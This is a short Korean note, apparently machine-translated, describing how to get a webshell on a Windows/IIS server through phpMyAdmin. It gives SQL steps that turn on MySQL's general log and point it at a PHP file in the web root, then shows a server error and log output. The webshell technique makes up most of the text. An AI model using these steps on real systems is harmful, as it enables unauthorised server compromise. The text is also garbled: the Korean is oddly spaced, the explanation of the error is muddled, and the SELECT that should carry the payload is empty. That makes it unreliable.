phpmyadmin 로그 로 셸 가 져 오기

환경: win 2003, IIS 6, PHP, asp, cgi - fcgi
1、set global general_log='on' 
2、set global general_log_file='c:\\phpstudy\\www\\log.php'   #     '\\'
3、select ""

시도 때 도 없 이 오류 발생:
HTTP/1.1 500 Server Error
Date: Tue, 23 Jan 2018 01:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 105
PHP Notice:  Use of undefined constant (  )shell - assumed 'shell' in C:\phpStudy4IIS\WWW\log.php on line 64

원인: [0] 중 0 은 상수 이 고 [0] 중 0 은 변수 이기 때문에 다음 과 같 습 니 다.
log.php    :
MySQLa, Version: 5.5.40 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
           96 Quit  
180123 10:20:47    97 Connect   root@localhost on 
           97 Query SET CHARACTER SET 'utf8'
           97 Query SET collation_connection = 'utf8_general_ci'
180123 10:20:48    97 Query SELECT ""
           97 Init DB   mysql
           97 Query SHOW MASTER LOGS
           97 Quit  ......
                                ......

좋은 웹페이지 즐겨찾기